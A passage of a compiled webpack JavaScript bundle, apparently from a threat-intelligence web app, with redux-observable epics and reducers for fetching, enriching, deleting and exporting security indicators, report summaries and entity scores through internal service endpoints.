      return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_13_modules_tags_types__["c" /* INDICATOR_TAGS_ENDPOINT */] + '/metadata', batch).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('response'));
    }).map(function (metadata) {
      return metadata.map(__WEBPACK_IMPORTED_MODULE_17__utils__["a" /* normalizeIndicatorShape */]);
    }).map(function (metadata) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["r" /* FETCH_INDICATOR_METADATA_SUCCESS */],
        payload: metadata
      };
    });
  }).catch(function (err) {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
      type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["q" /* FETCH_INDICATOR_METADATA_FAILURE */],
      payload: err,
      error: true,
      meta: {
        alert: { type: 'error', text: 'There was an error fetching indicator metadata.' }
      }
    });
  });
};

var fetchIndicatorsForTagEpic = function fetchIndicatorsForTagEpic(action$, store, _ref3) {
  var ajax = _ref3.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_10__action_types_js__["j" /* FETCH_INDICATORS_FOR_TAG */]).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('payload')).mergeMap(function (guid) {
    return ajax.get(__WEBPACK_IMPORTED_MODULE_13_modules_tags_types__["c" /* INDICATOR_TAGS_ENDPOINT */] + '/' + guid).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('response')).mergeMap(function (indicators) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["l" /* FETCH_INDICATORS_FOR_TAG_SUCCESS */],
        payload: Object(__WEBPACK_IMPORTED_MODULE_3_immutable__["fromJS"])(indicators)
      });
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["k" /* FETCH_INDICATORS_FOR_TAG_FAILURE */] }, Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["error"])('There was an error fetching summary data for this indicator tag.')]);
    });
  });
};

var fetchEnrichmentEpic = function fetchEnrichmentEpic(action$, store, _ref4) {
  var ajax = _ref4.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_10__action_types_js__["s" /* FETCH_IOC_ENRICHMENT */]).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('payload')).switchMap(function (indicator) {
    return ajax.get(enrichmentUrl(indicator.value)).mergeMap(function (_ref5) {
      var response = _ref5.response;

      return [{
        type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["u" /* FETCH_IOC_ENRICHMENT_SUCCESS */],
        payload: {
          id: Object(__WEBPACK_IMPORTED_MODULE_17__utils__["a" /* normalizeIndicatorShape */])(indicator).id,
          enrichment: Object(__WEBPACK_IMPORTED_MODULE_3_immutable__["fromJS"])(response)
        }
      }];
    }).catch(function (err) {
      return [{ type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["t" /* FETCH_IOC_ENRICHMENT_FAILURE */] }, Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["error"])('There was an error fetching the indicator enrichment.')];
    });
  });
};

var revertClassificationEpic = function revertClassificationEpic(action$, store, _ref6) {
  var ajax = _ref6.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_10__action_types_js__["x" /* REVERT_CLASSIFICATION */]).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('payload')).mergeMap(function (_ref7) {
    var reportId = _ref7.reportId,
        ioc = _ref7.ioc;

    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_9__constants_js__["c" /* IOC_ENRICHMENT_ENDPOINT */] + '/revert/' + reportId, ioc).mergeMap(function (_ref8) {
      var response = _ref8.response;

      return [{
        type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["z" /* REVERT_CLASSIFICATION_SUCCESS */],
        payload: { reportId: reportId, value: ioc.get('value') }
      }];
    }).catch(function (err) {
      return [{ type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["y" /* REVERT_CLASSIFICATION_FAILURE */] }, Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["error"])('There was an error reverting the indicator classification.')];
    });
  });
};

var deleteIndicatorEpic = function deleteIndicatorEpic(action$, store, _ref9) {
  var ajax = _ref9.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_10__action_types_js__["b" /* DELETE_INDICATOR */]).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('payload')).mergeMap(function (payload) {
    return ajax.delete(Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["querystring"])(payload, __WEBPACK_IMPORTED_MODULE_9__constants_js__["b" /* INDICATOR_LIST_ENDPOINT */])).mergeMap(function () {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([Object(__WEBPACK_IMPORTED_MODULE_11__actions__["fetchIndicatorList"])(), Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["success"])('Indicator ' + payload.type + '|' + payload.value + ' removed.')]);
    }).do(function () {
      return __WEBPACK_IMPORTED_MODULE_1_react_router__["browserHistory"].push('/browse/iocs');
    }).catch(function (err) {
      var message = Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["path"])(['xhr', 'response', 'message'])(err);
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["c" /* DELETE_INDICATOR_FAILURE */], payload: err }, Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["error"])(message ? message : 'There was an error deleting the indicator.')]);
    });
  });
};

var exportEntitiesEpic = function exportEntitiesEpic(action$, store, _ref10) {
  var ajax = _ref10.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_10__action_types_js__["g" /* EXPORT_INDICATORS_LIST */]).do(function () {
    return store.dispatch(Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["info"])('Starting export, this could take several seconds.'));
  }).mergeMap(function (request) {
    var state = store.getState();
    /* Grab current filters, and find what the total number of results is so we can set the pageSize to that */
    var entityQueryPayload = __WEBPACK_IMPORTED_MODULE_16_modules_search__["getters"].entityPageQuery(state);
    var totalResults = __WEBPACK_IMPORTED_MODULE_16_modules_search__["getters"].queryResults(state).getIn(['entities', 'totalElements']);

    var searchPayload = Object(__WEBPACK_IMPORTED_MODULE_18__search_epics__["b" /* formatSearchRequest */])(entityQueryPayload).set('type', 'INDICATOR').set('pageSize', totalResults);

    return ajax({
      url: __WEBPACK_IMPORTED_MODULE_9__constants_js__["a" /* INDICATOR_EXPORT_ENDPOINT */],
      method: 'POST',
      body: searchPayload,
      responseType: 'text', // <-- IMPORTANT. response will be null if the observable doesn't know its text
      headers: { Accept: '*/*', 'Content-Type': 'application/json; charset=UTF-8' }
    }).do(function (_ref11) {
      var response = _ref11.response;

      Object(__WEBPACK_IMPORTED_MODULE_8_trustar_utils_index__["saveTextToFile"])('indicators.csv', response);
    }).mergeMap(function () {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["success"])('Export indicators success.'), { type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["i" /* EXPORT_INDICATORS_LIST_SUCCESS */] }]);
    }).catch(function (err) {
      var errMessage = 'Could not export indicators';

      try {
        // AjaxObservable wraps the message field in the error response pretty deep and keeps it in string form, so we must try and parse
        var errResponseMessage = JSON.parse(err.response);
        errMessage = errResponseMessage.message || errMessage;
      } catch (error) {
        console.error(error);
      }

      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["error"])(errMessage), { type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["h" /* EXPORT_INDICATORS_LIST_FAILURE */] }]);
    });
  });
};

var exportIndicatorsForTagEpic = function exportIndicatorsForTagEpic(action$, store, _ref12) {
  var ajax = _ref12.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_10__action_types_js__["d" /* EXPORT_INDICATORS_FOR_TAG */]).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('payload')).do(function () {
    return store.dispatch(Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["info"])('Starting export, this could take several seconds.'));
  }).mergeMap(function (guid) {
    return ajax({
      url: __WEBPACK_IMPORTED_MODULE_13_modules_tags_types__["c" /* INDICATOR_TAGS_ENDPOINT */] + '/export?guid=' + guid,
      method: 'GET',
      responseType: 'text', // <-- IMPORTANT. response will be null if the observable doesn't know its text
      headers: { Accept: '*/*', 'Content-Type': 'application/json; charset=UTF-8' }
    }).do(function (_ref13) {
      var response = _ref13.response;
      return Object(__WEBPACK_IMPORTED_MODULE_8_trustar_utils_index__["saveTextToFile"])('indicators.csv', response);
    }).mergeMap(function () {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["success"])('Export indicators success.'), { type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["f" /* EXPORT_INDICATORS_FOR_TAG_SUCCESS */] }]);
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["error"])('Could not export indicators.'), { type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["e" /* EXPORT_INDICATORS_FOR_TAG_FAILURE */] }]);
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_2_redux_observable__["combineEpics"])(handleTimeRangeEpic, fetchIndicatorMetadataEpic, fetchIndicatorsForTagEpic, fetchEnrichmentEpic, revertClassificationEpic, deleteIndicatorEpic, exportEntitiesEpic, exportIndicatorsForTagEpic));

/***/ }),
/* 3201 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return IOC_ENRICHMENT_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return INDICATOR_LIST_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return INDICATOR_EXPORT_ENDPOINT; });
var IOC_ENRICHMENT_ENDPOINT = '/services/cpe';
var INDICATOR_LIST_ENDPOINT = '/services/indicators';

var INDICATOR_EXPORT_ENDPOINT = '/services/indicators/export-results.csv';

/***/ }),
/* 3202 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export current */
/* unused harmony export summaries */
/* unused harmony export hasSummary */
/* unused harmony export loading */
/* unused harmony export summaryFullyExpanded */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__types__ = __webpack_require__(301);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types_js__ = __webpack_require__(373);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_modules_constellation_action_types_js__ = __webpack_require__(143);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__action_types__ = __webpack_require__(373);









var current = function current() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : __WEBPACK_IMPORTED_MODULE_2__types__["a" /* Summary */]();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* FETCH_SUMMARY_SUCCESS */]:
      return payload;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["i" /* FETCH_SUMMARY_FAILURE */]:
      return __WEBPACK_IMPORTED_MODULE_2__types__["a" /* Summary */]();
    default:
      return state;
  }
};

var summaries = function summaries() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* FETCH_SUMMARY_SUCCESS */]:
      var reportId = payload.get('reportId', '');
      return state.set(reportId, payload);
    case __WEBPACK_IMPORTED_MODULE_5__action_types__["g" /* FETCH_SUMMARIES_FOR_REPORTS_SUCCESS */]:
      var reportIdList = payload.get('items', '');
      var summariesMergedToState = reportIdList.reduce(function (finalOutput, currentSummary) {
        // If this summary item has a reportId, add it/replace the current summary entry for that ID
        var summaryReportId = currentSummary.get('reportId', '');

        return summaryReportId ? finalOutput.set(summaryReportId, currentSummary) : finalOutput;
      }, state); // <-- state here is the init value of the reduce function

      return summariesMergedToState;
    default:
      return state;
  }
};

var hasSummary = function hasSummary() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* FETCH_SUMMARY_SUCCESS */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["a" /* CLEAR_SUMMARY */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["i" /* FETCH_SUMMARY_FAILURE */]:
      return false;
    default:
      return state;
  }
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["h" /* FETCH_SUMMARY */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* FETCH_SUMMARY_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["i" /* FETCH_SUMMARY_FAILURE */]:
      return false;
    default:
      return state;
  }
};
var summaryFullyExpanded = function summaryFullyExpanded() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;

  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["k" /* SHOW_ENTIRE_SUMMARY_TOGGLE */]:
      if (payload && payload.hasOwnProperty('show')) {
        return payload.show;
      } else {
        return !state;
      }
    default:
      return state;
  }
};

var enclaveClosedSourceMapping = function enclaveClosedSourceMapping() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["d" /* FETCH_CS_ENCLAVE_SOURCE_SUCCESS */]:
      return payload;
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  current: current,
  loading: loading,
  hasSummary: hasSummary,
  summaries: summaries,
  summaryFullyExpanded: summaryFullyExpanded,
  enclaveClosedSourceMapping: enclaveClosedSourceMapping
}));

/***/ }),
/* 3203 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__constants__ = __webpack_require__(404);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__action_types__ = __webpack_require__(373);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__utils__ = __webpack_require__(882);








/* Fetches summary table */
var fetchSummaryEpic = function fetchSummaryEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_5__action_types__["h" /* FETCH_SUMMARY */]).mergeMap(function (_ref2) {
    var payload = _ref2.payload;

    return ajax.get(__WEBPACK_IMPORTED_MODULE_6__utils__["e" /* resolveSummaryEndpoint */](payload)).map(function (_ref3) {
      var response = _ref3.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_5__action_types__["j" /* FETCH_SUMMARY_SUCCESS */],
        payload: __WEBPACK_IMPORTED_MODULE_6__utils__["d" /* normalizeSummary */](response)
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_5__action_types__["i" /* FETCH_SUMMARY_FAILURE */], payload: err });
    });
  });
};

var fetchClosedSourceEnclaveMap = function fetchClosedSourceEnclaveMap(action$, store, _ref4) {
  var ajax = _ref4.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_5__action_types__["c" /* FETCH_CS_ENCLAVE_SOURCE_MAP */]).mergeMap(function (_ref5) {
    var payload = _ref5.payload;

    return ajax.get(__WEBPACK_IMPORTED_MODULE_4__constants__["a" /* ENCLAVE_MAPPING_FOR_CS_ENDPOINT */]).map(function (_ref6) {
      var response = _ref6.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_5__action_types__["d" /* FETCH_CS_ENCLAVE_SOURCE_SUCCESS */],
        payload: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])(response).toOrderedMap()
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_5__action_types__["b" /* FETCH_CS_ENCLAVE_SOURCE_FAILURE */], payload: err });
    });
  });
};

// Given a list of reportIds, returns summaries for each of the reports
var fetchSummariesForReports = function fetchSummariesForReports(action$, store, _ref7) {
  var ajax = _ref7.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_5__action_types__["e" /* FETCH_SUMMARIES_FOR_REPORTS */]).mergeMap(function (_ref8) {
    var payload = _ref8.payload;

    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_4__constants__["c" /* FETCH_SUMMARIES_ENDPOINT */], payload).map(function (_ref9) {
      var response = _ref9.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_5__action_types__["g" /* FETCH_SUMMARIES_FOR_REPORTS_SUCCESS */],
        payload: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])(response)
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_5__action_types__["f" /* FETCH_SUMMARIES_FOR_REPORTS_FAILURE */], payload: err });
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_3_redux_observable__["combineEpics"])(fetchSummaryEpic, fetchClosedSourceEnclaveMap, fetchSummariesForReports));

/***/ }),
/* 3204 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchScores", function() { return fetchScores; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "updateFilters", function() { return updateFilters; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "resetFilters", function() { return resetFilters; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__action_types_js__ = __webpack_require__(764);




/* Fetches all scores entries */
var fetchScores = function fetchScores() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["b" /* FETCH_ENTITY_SCORES_PAGE */]
  };
};

var updateFilters = function updateFilters(payload, field) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["f" /* UPDATE_PAGE_FILTERS */],
    payload: payload,
    field: field
  };
};

var resetFilters = function resetFilters() {
  return { type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["e" /* RESET_PAGE_FILTERS */] };
};

/***/ }),
/* 3205 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export scores */
/* unused harmony export modalOpen */
/* unused harmony export loading */
/* unused harmony export scoreSortOptions */
/* unused harmony export scoreSortDirection */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__defaults__ = __webpack_require__(765);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__getters__ = __webpack_require__(766);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__action_types_js__ = __webpack_require__(764);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__types__ = __webpack_require__(767);








var scores = function scores() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["d" /* FETCH_ENTITY_SCORES_PAGE_SUCCESS */]:
      var items = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(payload.get('items')).filter(function (d) {
        return d.has('reportId');
      }).toOrderedMap().mapKeys(function (k, v) {
        return v.get('reportId');
      });
      return state.merge(items);
    default:
      return state;
  }
};

var modalOpen = function modalOpen() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  return state;
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["b" /* FETCH_ENTITY_SCORES_PAGE */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["d" /* FETCH_ENTITY_SCORES_PAGE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["c" /* FETCH_ENTITY_SCORES_PAGE_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["e" /* RESET_PAGE_FILTERS */]:
      return false;
    default:
      return state;
  }
};

var scoreSortOptions = function scoreSortOptions() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : __WEBPACK_IMPORTED_MODULE_2__defaults__["a" /* getDefaultScoreSortOption */]();
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["h" /* UPDATE_SCORE_SORT_OPTIONS */]:
      return action.payload;
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["a" /* CLEAR_SCORE_SORT_OPTIONS */]:
      return __WEBPACK_IMPORTED_MODULE_2__defaults__["a" /* getDefaultScoreSortOption */]();
    default:
      return state;
  }
};

var scoreSortDirection = function scoreSortDirection() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : __WEBPACK_IMPORTED_MODULE_2__defaults__["b" /* sortComparators */].ASC;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["g" /* UPDATE_SCORE_SORT_DIRECTION */]:
      return action.payload;
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["a" /* CLEAR_SCORE_SORT_OPTIONS */]:
      return __WEBPACK_IMPORTED_MODULE_2__defaults__["b" /* sortComparators */].ASC;
    default:
      return state;
  }
};

var currentQuery = function currentQuery() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : __WEBPACK_IMPORTED_MODULE_3__getters__["defaultPayload"];
  var action = arguments[1];
  var type = action.type,
      payload = action.payload,
      field = action.field;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["f" /* UPDATE_PAGE_FILTERS */]:
      if (!field) {
        // Error message for now until better solution
        console.error("Error updating filter, missing field name or 'all'");
        return state;
      }

      if (field && field.includes('.')) {
        // Nested fields separated by .
        var updatePath = field.split('.');
        return state.setIn(updatePath, payload);
      }
      if (field && field === 'query') {
        state = state.set('pageNumber', 0);
      }
      return state.set(field, payload.get(field));
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["e" /* RESET_PAGE_FILTERS */]:
      return __WEBPACK_IMPORTED_MODULE_3__getters__["defaultPayload"];
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  sort: Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
    scores: Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
      options: scoreSortOptions,
      dir: scoreSortDirection
    })
  }),
  scores: scores,
  loading: loading,
  currentQuery: currentQuery,
  modalOpen: modalOpen
}));

/***/ }),
/* 3206 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_querystring__ = __webpack_require__(119);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_querystring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_querystring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_react_router_redux__ = __webpack_require__(100);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_react_router_redux___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_react_router_redux__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__constants__ = __webpack_require__(1418);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__action_types__ = __webpack_require__(764);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__types__ = __webpack_require__(767);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__getters_js__ = __webpack_require__(766);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions__ = __webpack_require__(76);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11__utils__ = __webpack_require__(1419);














var formatSearchRequest = function formatSearchRequest(payload) {
  var sort = payload.getIn(['sort', 'sort'], {});
  var params = {
    sort: sort.sortBy + ',' + sort.sortDirection,
    pageNumber: payload.get('pageNumber'),
    pageSize: payload.get('pageSize')
  };
  return Object(__WEBPACK_IMPORTED_MODULE_3_querystring__["stringify"])(params);
};

/* Fetches all scores entries and aliases */
var fetchScoresPageEpic = function fetchScoresPageEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types__["b" /* FETCH_ENTITY_SCORES_PAGE */], __WEBPACK_IMPORTED_MODULE_7__action_types__["f" /* UPDATE_PAGE_FILTERS */], __WEBPACK_IMPORTED_MODULE_7__action_types__["e" /* RESET_PAGE_FILTERS */]).mergeMap(function () {
    var currentQuery = __WEBPACK_IMPORTED_MODULE_9__getters_js__["currentQueryWithEntities"](store.getState());
    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_6__constants__["a" /* SCORES_ENDPOINT */] + '?' + formatSearchRequest(currentQuery), currentQuery.get('query').toJS()).map(Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["prop"])('response')).map(function (response) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_7__action_types__["d" /* FETCH_ENTITY_SCORES_PAGE_SUCCESS */],
        payload: __WEBPACK_IMPORTED_MODULE_8__types__["a" /* ScoresPage */](response)
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_7__action_types__["c" /* FETCH_ENTITY_SCORES_PAGE_FAILURE */] });
    });
  });
};

var hasNextPage = function hasNextPage(payload) {
  return payload.get('hasNext', false) && !payload.get('empty', true);
};

// /*  FIXME: Let's finish this later */
// const fetchNextScoresPageEpic = (action$, store, { ajax }) =>
//   action$.ofType(FETCH_ENTITY_SCORES_PAGE_SUCCESS).map(({ payload }) => {
//     if (hasNextPage(payload)) {
//       return {
//         type: 'FETCH_NEXT_ENTITY_SCORES_PAGE'
